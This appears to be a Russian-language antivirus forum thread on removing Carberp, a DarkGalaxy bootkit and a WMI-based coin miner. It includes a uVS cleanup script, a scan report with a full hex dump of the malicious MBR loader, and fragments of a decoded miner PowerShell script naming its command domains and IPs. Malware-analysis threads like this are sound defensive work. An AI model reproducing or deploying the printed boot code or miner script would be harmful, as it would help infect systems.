поговорить о uVS, Carberp, планете Земля

RSS
Обсуждаем Carberp всех модификаций :)


Цитата
;uVS v3.71 script [http://dsrt.dyndns.org]

zoo %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
bl 6D99C48BBD436116B78A04997D854F57 164352
delall %SystemDrive%\DOCUMENTS AND SETTINGS\HOUSE\ГЛАВНОЕ МЕНЮ\ПРОГРАММЫ\АВТОЗАГРУЗКА\IGFXTRAY.EXE
delall %SystemDrive%\DOCUMENTS AND SETTINGS\ALL USERS\APPLICATION DATA\ICQ\ICQNEWTAB\NEWTAB.HTML
regt 1
regt 2
regt 7
regt 18
deltmp
delnfr
restart
Изменено: Арвид - 22.11.2011 13:07:19
Правильно заданный вопрос - это уже половина ответа

Ответы

Цитата
RP55 RP55 написал:
А здесь у нас WMI...
и не только.
возможно было два конкурирующих продукта майнеров (BOOT.DarkGalaxy
https://www.virustotal.com/ru/file/8a7f542b6cff744dd7d80eb510b6359e9214640c03ded5dc­1acfe5274d891103/analysis/1540003309/
и WMI-майнер AdylKuzz)

Цитата
Полное имя                  MBR#0 [931,5GB]
Имя файла                   MBR#0 [931,5GB]
Тек. статус                 ?ВИРУС? ВИРУС загрузчик
                           
Обнаруженные сигнатуры      
Сигнатура                   Trojan.Boot.DarkGalaxy.a [Kaspersky] (delall) [глубина совпадения 64(64), необх. минимум 64, максимум 64] 2018-09-14
                           
www.virustotal.com          Хэш НЕ найден на сервере.
www.virustotal.com          2018-10-20
Kaspersky                   Trojan.Boot.DarkGalaxy.a
DrWeb                       Trojan.NtRootKit.19689
                           
Сохраненная информация      на момент создания образа
Статус                      загрузчик
Размер                      440 байт
                           
Доп. информация             на момент обновления списка
SHA1                        70AF4248427B9FDB75AEB76CF5DB95D2FA55B803
                           
#BINOBJ#                    29DB29C0FA5317368926FE7BBCFE7B1E6660531F3EA1130424FC83E8403E­A31304C1E0068EC0FC0E58C1E004E8000083E82F5E01C631FFB90001F3A5­1E066A0007B83C02B90300BA8000BB007ECD13071FBE047EBF0002E80500­0668BE00CB60BB008029ED29D229C029C94DE8030061C3A4E8400072FA41­E83500E34073F983E903720688CCACF7D09531C9E8210011C9750841E819­0073FB414181FD00F383D1018D03961E06061FF3A4071F96EBC2E8020011­C901DB7504AD11C093C3B8AA55CD153D55AA7403E8350131D28EC2B80102­B90200BA8000BB007CCD1366611F5CEA007C000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­000000000000000000000000000000000000000000000000000000000000­00000000000000000000000000000000002C4463FA42EBE5000000010100­07FEFFFF3F000000809D841E00FEFFFF07FEFFFFBF9D841E98E5691800FE­FFFF07FEFFFF5783EE366AD6813D00000000000000000000000000000000­55AA
кроме того, там же,
по уже после очистки от BOOT.DarkGalaxy, система была не пропатчена, и еще раз произошло заражение через сетевую атаку и WMI

можно предположить, что на этот раз в WMI был прописан запуске через powershell закодированного скрипта.

Цитата
powershell.exe в Windows
и грузит ЦП на 50%

Цитата
Процесс: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Модуль: 1
Spyware.InfoStealer.Themida, C:\WINDOWS\TEMP\COHERNECE.EXE, Проигнорировано пользователем, [8497], [529451],1.0.7465

Инструментарий управления Windows (WMI): 3
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__FilterToConsumerBinding.Consumer="CommandLineEventConsumer.Name="Windows Events Consumer"",Filter="__EventFilter.Name="Windows Events Filter"", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:__EventFilter.Name="Windows Events Filter", Проигнорировано пользователем, [14167], [528077],1.0.7465
Hijack.BitCoinMiner.WMI.Generic, \\WIN-5CAGQT8ID9L\ROOT\subscription:CommandLineEventConsumer.Name="Windows Events Consumer", Проигнорировано пользователем, [14167], [528077],1.0.7465

+
добавлю строки из раскодированного скрипта.
взят из другого примера.

Цитата
$se=@(('update.7h4uk.com'),('info.7h4uk.com'),('185.128.43.62'),('185.234.217.139'))


$defun=[System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs))

RunDDOS "cohernece.exe"

KillBot('System_Anti_Virus_Core')
ESET machine-learning engine Augur versus the most infamous ransomware families of 2017

(ESET машинное обучение в движке Augur  против наиболее известных семейств ransomware 2017 года)


Чтобы продемонстрировать результаты Augur, мы протестировали его ранние сборки, полученные в первые месяцы 2017 года, против самых распространенных штампов ransomware, ориентированных на бизнес-среду в конце этого года. Набор тестов включал в себя образцы Diskcoder.C / NotPetya, DiskCoder.D / BadRabbit и WannaCryptor.D / WannaCry, а также множество вариантов Crysis ransomware.

Результаты показывают, что, несмотря на то, что модель Augur на несколько месяцев старше образцов вредоносных программ, коэффициент обнаружения файлов высокий, в некоторых случаях близок к безупречному. Тем не менее, самым важным результатом является то, что Augur смог правильно идентифицировать вредоносный характер образца в момент его запуска в память зараженного устройства. Это предоставит защитникам возможность остановить угрозу до того, как она может нанести серьезный ущерб в инфраструктуре компании.



https://www.eset.com/us/about/newsroom/corporate-blog/eset-machine-learning-engine-augur-versus-the-most-infamous-ransomware-families-of-2017/

https://www.welivesecurity.com/wp-content/uploads/2018/08/Can_AI_Power_Future_Malware.pdf
Инструмент очистки Chrome получит функцию удаления «принудительно установленных расширений»
«Инструмент очистки Chrome» – программа, созданная Google, которая включает движок обнаружения и удаления угроз от компании ESET. Данный компонент часто фигурирует под кодовыми именами "Chrome Protector" или "Chrome Cleanup".

Chrome будет регулярно запускать этот инструмент, загружать новейшие сигнатурные определения и обновления движка с серверов ESET и выполнять сканирование компьютера на нежелательные программы. В случае обнаружения вредоносного объекта, который может нарушать работу Chrome, инструмент предложит удалить обнаруженную угрозу.

Пользователи могут самостоятельно запустить сканирование, перейдя на страницу chrome://settings/cleanup в браузере.
https://www.virusradar.com/en/Win64_Vools.B/description

Цитата
Win64/Vools.B is a trojan that spreads via network exploiting vulnerabilities of the operating system.
The trojan generates various IP addresses.
It connects to remote machines to port 445 in attempt to exploit the Microsoft Server Message Block (SMB) vulnerability.
This vulnerability is described in Microsoft Security Bulletin MS17-010 .
If it succeeds, a copy of the trojan is retrieved from the attacking machine.
Цитата
Firefox может показывать рекламу на странице новой вкладки.
https://www.comss.ru/page.php?id=5684

Цитата
Организация Mozilla уже успела выпустить официальное заявление:

Данная заметка является экспериментальной и предлагает пользователям Firefox дополнительные преимущества от нашего партнера.
Статья про левые ЭЦП - Здесь.
Удивительно дело - в первые в истории человечества.   ;)
Цитата
RP55 RP55 написал:
Статья про левые ЭЦП -  Здесь.
Удивительно дело - в первые в истории человечества.   ;)
ну да, об этом еще Маяковский писал, что "к мандатам почтения нету, к любым чертям с матерями катись любая бумажка, но эту...." :).

Системам обнаружения вредоносных программ нужны файлы с маркировкой, чтобы защитить компьютеры, подключенные к Интернету, от заражения. Тем не менее, огромное количество программных файлов, поступающих с непопулярных веб-сайтов, все еще не помечены и остаются неизвестными или неопределенными угрозами.

какую маркировку они имеют ввиду?
Цитата
santy написал:
какую маркировку они имеют ввиду?

Здесь видимо о:

Так  у COMODO в их продуктах есть  список вендоров:  ( надёжные вендоры )

у Kaspersky есть: Kaspersky Application Advisor ( Whitelist )  информация об уровне безопасности файлов.
файлы проверяются на наличие авторизованных сертификатов. ( Trusted )

Рейтинг файлов\процессов в ESET

Получается, если  файл уже известен от получает ту, или иную маркировку\метку.

Как известно у продуктов есть уровни реагирования.
Если A.V. продукт начнёт блокировать любой новый\неизвестный\модифицированный\битый файл - то пользователи не будут от этого в восторге.
http://www.tehnari.ru/f183/t262601/

C:\USERS\1\APPDATA\ROAMING\TEMPO\
юмористы.
или почему правая нога не знает, что чешет левая.
NSCPUCNMINER32.EXE
Читают тему (гостей: 3)